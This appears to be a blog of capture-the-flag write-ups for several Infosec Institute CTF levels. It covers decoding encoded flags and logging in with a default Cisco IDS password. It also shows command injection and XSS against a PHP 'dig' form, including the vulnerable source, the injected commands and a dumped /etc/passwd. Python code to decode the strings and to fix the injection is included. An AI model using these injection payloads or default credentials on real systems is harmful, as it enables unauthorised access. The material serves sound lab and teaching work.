Sunday 15 March 2015

Infosec CTF | Level 14

Infosec CTF

Level 14 : infosec_flagis_whatsorceryisthis



Open the file.

By opening it we learn that it is an SQL dump.
Let's search for the word "flag" (we are looking for a flag, remember?).

There is a table named flag. INTERESTING!
Let's analyse what information it contains...
There is an admin account with a hashed password. I tried to decrypt it but with no luck
(it is a WordPress password hash, by the way...).

If you scroll down, there is a table named "friends". A strange name appears there:
 \\u0069\\u006e\\u0066\\u006f\\u0073\\u0065\\u0063\\u005f\\u0066\\u006c\\u0061\\u0067\\u0069\\u0073\\u005f\\u0077\\u0068\\u0061\\u0074\\u0073\\u006f\\u0072\\u0063\\u0065\\u0072\\u0079\\u0069\\u0073\\u0074\\u0068\\u0069\\u0073

Really suspicious, I would say. Let's try to decode it. It looks like a string of \uXXXX Unicode escapes (each \u0069 is one character, here 'i'), except that every backslash has itself been escaped once more, as string contents usually are on their way into an SQL dump. There is nothing to lose :)

Strip the extra backslash from each escape, decode the \u00XX sequences, and the flag is yours ;)







Infosec CTF | Level 12

Infosec CTF

Level 12 : infosec_flagis_heyimnotacolor


Hint: Dig deeper!

That's the same picture as level 1, so we have to dig deeper into the source code :)
[ctrl+u to view the source code]

At first glance the source code has the same elements as all the previous levels, but there has to be a small difference. Let's compare the source code of level 1 with the source code of level 12!

A new line has been added to the source code, pointing at a file. Let's check out the file :)

That's a hex-encoded string (696e666f7365635f666c616769735f686579696d6e6f7461636f6c6f72): every pair of hex digits is one ASCII byte. Decode it and the flag is yours!








Infosec CTF | Level 9

Infosec CTF

Level 9 : ssaptluafed_sigalf_cesofni (the flag, written backwards)


As we can see, this is a Cisco IDS login panel.
Tip: in every penetration test, check for default credentials; many admins forget to change them.

So we search for the default credentials with the help of the Google search engine, the best hacking tool!


As you can see, we do not even have to visit the page: the default credentials show up right in the search results.
username:password
root:attack


And the flag pops up ...





Saturday 14 March 2015

Infosec CTF | Level 15

Infosec CTF

Level 15 : infosec_flagis_rceatomized

First of all, Level 15 is also vulnerable to XSS :P
Type &echo "<script>alert('Xss')</script>" into the box: whatever the injected command prints is written straight into the page inside the <pre> tag without any escaping, so the browser renders the script tag.
PoC:


Now let's focus on our goal!
The real issue with the app is that it is vulnerable to command injection.
Quick guide to command injection: in sh the ampersand (&) is a control operator. It starts the command before it in the background and immediately goes on to execute whatever follows, so everything after the & is a second, independent command. In this level we use & to break out of the dig command and run our own commands alongside it (; , | , && and || would work just as well).

Let's run some commands in order to "map" the attack surface.

A good start for every attack is &whoami, to see which user our commands run as (many people would say run id instead; it shows the same user plus its groups).
No root :/
Let's see the current directory with &pwd

OK, now we have something. Let's list the files inside the folder /levelfiften. Insert &find to list all the files and subdirectories recursively, hidden ones included (a plain ls would skip names starting with a dot).
                  



Hmmmmm, there is a file named .hey! Let's open the file with our browser.


Now we have to decode the string Miux+mT6Kkcx+IhyMjTFnxT6KjAa+i6ZLibC :) . It is not a hash: it is the flag encoded, not encrypted, so it can be reversed without any key.

It was encoded with Atom-128, a base64 variant that uses a shuffled alphabet. See it for yourself with an online Atom-128 decoder.
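Added example, not code from the write-up: Python decoders for the three encodings met in Levels 14, 12 and 15 (doubly escaped \uXXXX Unicode, hex, Atom-128). Atom-128 packs bits exactly like base64; only the alphabet differs, and the alphabet below is the one used by the common JavaScript implementation of the scheme, with its 65th character acting as the pad. Function names are mine, and the sample inputs in the main block are the strings quoted in the write-ups.

```python
"""Decoders for the encodings met in Levels 14, 12 and 15 (added example)."""
import re

# Atom-128: the same 6-bit packing as base64, but with a permuted alphabet.
# Alphabet of the common JavaScript Atom-128 implementation; its 65th
# character, 'C', is the padding symbol (what '=' is in standard base64).
ATOM128_KEY = "/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC"
ATOM128_PAD = 64  # index of the pad character within ATOM128_KEY


def atom128_decode(text: str) -> bytes:
    """Decode an Atom-128 string to bytes.

    Characters outside the alphabet are dropped, as the original decoder does.
    """
    clean = [c for c in text if c in ATOM128_KEY]
    if len(clean) % 4:
        raise ValueError("Atom-128 input length must be a multiple of 4")
    out = bytearray()
    for i in range(0, len(clean), 4):
        e1, e2, e3, e4 = (ATOM128_KEY.index(c) for c in clean[i:i + 4])
        out.append((e1 << 2) | (e2 >> 4))              # 6 + 2 bits
        if e3 != ATOM128_PAD:
            out.append(((e2 & 15) << 4) | (e3 >> 2))   # 4 + 4 bits
        if e4 != ATOM128_PAD:
            out.append(((e3 & 3) << 6) | e4)           # 2 + 6 bits
    return bytes(out)


# One or more backslashes, 'u', four hex digits.  The SQL dump has every
# backslash doubled (\\u0069) because an already escaped string was escaped
# again on its way into the dump; tolerating any number of leading backslashes
# makes both the single and the double form decode.
_UNICODE_ESCAPE = re.compile(r"\\+u([0-9a-fA-F]{4})")


def decode_unicode_escapes(text: str) -> str:
    """Turn \\u0069-style escapes (singly or doubly escaped) into characters."""
    return _UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def decode_hex(text: str) -> str:
    """Decode a hex string such as 696e666f... to text (two hex digits per byte)."""
    return bytes.fromhex(text.strip()).decode("utf-8")


if __name__ == "__main__":
    # The three strings quoted in the write-ups.
    level14 = (r"\\u0069\\u006e\\u0066\\u006f\\u0073\\u0065\\u0063\\u005f"
               r"\\u0066\\u006c\\u0061\\u0067\\u0069\\u0073\\u005f"
               r"\\u0077\\u0068\\u0061\\u0074\\u0073\\u006f\\u0072\\u0063"
               r"\\u0065\\u0072\\u0079\\u0069\\u0073\\u0074\\u0068\\u0069\\u0073")
    level12 = "696e666f7365635f666c616769735f686579696d6e6f7461636f6c6f72"
    level15 = "Miux+mT6Kkcx+IhyMjTFnxT6KjAa+i6ZLibC"
    print("level 14:", decode_unicode_escapes(level14))
    print("level 12:", decode_hex(level12))
    print("level 15:", atom128_decode(level15).decode("latin-1"))
```

The Atom-128 decoder returns bytes rather than text because the scheme, like base64, carries arbitrary bytes; decode them as latin-1 or utf-8 once you know they are text.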






----------------------------- What I found while I was trying to solve the challenge -----------------------------
Also, the source of the index.php script:

<?php
if (isset($_POST['dig'])) {
    echo "<pre>";
    $cmd = $_POST['dig'];
    // The user input is appended to the command line verbatim and handed to
    // /bin/sh, so shell metacharacters such as & ; | run additional commands.
    // The command output is echoed into the page unescaped, hence the XSS too.
    system("dig mx " . $cmd);
    echo "</pre>";
    die;
}
?>
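As an added illustration, not the challenge's code: a Python model of the concatenation in index.php. shell_commands splits a command line the way sh does, so you can see that a value such as &whoami turns the single intended dig invocation into two commands, and that the XSS payload above is just a second command whose output lands in the page. Beside it, a fixed variant validates the target against a DNS-name allow-list (an assumed policy, not something the CTF defines) and runs dig with an argv list instead of a shell. Function names, the regex and the sample payloads are mine. The PHP equivalent of the fix is to validate the value and wrap it in escapeshellarg(), or better, not to hand user-controlled input to system() at all.

```python
"""Model of the Level 15 injection and of a fixed lookup (added example)."""
import re
import shlex
import subprocess
from typing import List

# sh control operators that terminate one simple command and start the next.
# (Redirections and newlines are not modelled; they are not needed here.)
SHELL_SEPARATORS = {"&", "&&", ";", "|", "||"}

# Allow-list for a DNS name: dot-separated labels of letters, digits and
# hyphens (assumed policy).  Nothing sh treats specially can match, and a
# leading '-' or '+' is rejected too, so the value cannot become a dig option.
DNS_NAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z0-9-]{1,63}$",
    re.IGNORECASE,
)


def vulnerable_command_line(user_input: str) -> str:
    """What the PHP hands to /bin/sh: system("dig mx " . $cmd), no escaping."""
    return "dig mx " + user_input


def shell_commands(command_line: str) -> List[List[str]]:
    """Split a command line the way sh does: one argv per simple command."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands: List[List[str]] = []
    current: List[str] = []
    for token in lexer:
        if token in SHELL_SEPARATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def injected_commands(user_input: str) -> List[List[str]]:
    """Every command beyond the intended dig that the shell would run."""
    return shell_commands(vulnerable_command_line(user_input))[1:]


def is_dns_name(value: str) -> bool:
    """True when the value matches the allow-list above."""
    return DNS_NAME_RE.match(value) is not None


def safe_argv(user_input: str) -> List[str]:
    """Fixed version: validate against the allow-list and build an argv list.

    The list is passed to execve directly (no shell), so even a value that
    slipped past validation would reach dig as one argument, not as sh syntax.
    """
    name = user_input.strip()
    if not is_dns_name(name):
        raise ValueError(f"rejected lookup target: {user_input!r}")
    return ["dig", "mx", name]


def lookup_mx(user_input: str) -> str:
    """Run the validated lookup without a shell and return dig's output."""
    argv = safe_argv(user_input)
    try:
        done = subprocess.run(argv, capture_output=True, text=True, timeout=15)
    except FileNotFoundError:
        return "dig is not installed on this host"
    except subprocess.TimeoutExpired:
        return "dig timed out"
    return done.stdout


if __name__ == "__main__":
    # Constructed payloads: the ones used in the write-up plus a benign value.
    for payload in ("example.com", "&whoami", "example.com; cat .hey",
                    '&echo "<script>alert(\'Xss\')</script>"'):
        print(f"{payload!r:45} -> sh runs {shell_commands(vulnerable_command_line(payload))}")
        print(f"{'':45}    allow-list accepts: {is_dns_name(payload)}")
```

shell_commands only parses; it never executes anything, which is what you want when you are reasoning about a payload rather than firing it. lookup_mx does run dig, but only for a value that passed the allow-list, and only through an argv list.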

The /etc/passwd file:
 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false

Everything that is installed (the names are packages and shared libraries, most likely a listing of /usr/lib):
Apache2
apt
byobu
cgi-bin
cloud-init
command-not-found
coreutils
dbus-1.0
dpkg
eject
gcc
girepository-1.0
gnupg
grub
grub-legacy
initramfs-tools
insserv
klibc
landscape
language-selector
libbind9.so.90
libbind9.so.90.0.9
libcwidget.so.3
libcwidget.so.3.0.0
libdns.so.100
libdns.so.100.2.2
libdumbnet.la
libdumbnet.so.1
libdumbnet.so.1.0.1
libeatmydata
libgirepository-1.0.so.1
libgirepository-1.0.so.1.0.0
libguestlib.a
libguestlib.so
libguestlib.so.0
libguestlib.so.0.0.0
libhgfs.a
libhgfs.so
libhgfs.so.0
libhgfs.so.0.0.0
libisc.so.95
libisc.so.95.5.0
libisccc.so.90
libisccc.so.90.0.6
libisccfg.so.90
libisccfg.so.90.1.0
liblwres.so.90
liblwres.so.90.0.7
libperl.so.5.18
libperl.so.5.18.2
libvmtools.a
libvmtools.so
libvmtools.so.0
libvmtools.so.0.0.0
libxapian.so.22
libxapian.so.22.6.3
linux-boot-probes
locale
man-db
mime
mysql
open-vm-tools
openssh
os-prober
os-probes
perl
perl5
php5
pkgconfig
pm-utils
policykit-1
pppd
pt_chown
python2.7
python3
python3.4
rsyslog
sasl2
sftp-server
software-properties
ssl
sudo
systemd
tar
tasksel
tc
tmpfiles.d
ubuntu-release-upgrader
update-notifier
upstart
valgrind
w3m
x86_64-linux-gnu

Infosec CTF | Level 1

Infosec CTF 


Level 1 : infosec_flagis_welcome


Hint: May the source be with you !

It was pretty straightforward that we have to look at the source code.
[ctrl+u to view the source code]






A second way is to use curl to view the source code:

On Linux curl is pre-installed on many distros, but on Windows you have to download curl (choose the curl executable). When the download finishes, place curl.exe on your Desktop and cd to that folder in cmd.

On Linux:
Type curl ctf.infosecinstitute.com | grep flag in a terminal and you will see the flag (grep keeps only the lines of the page source that contain "flag").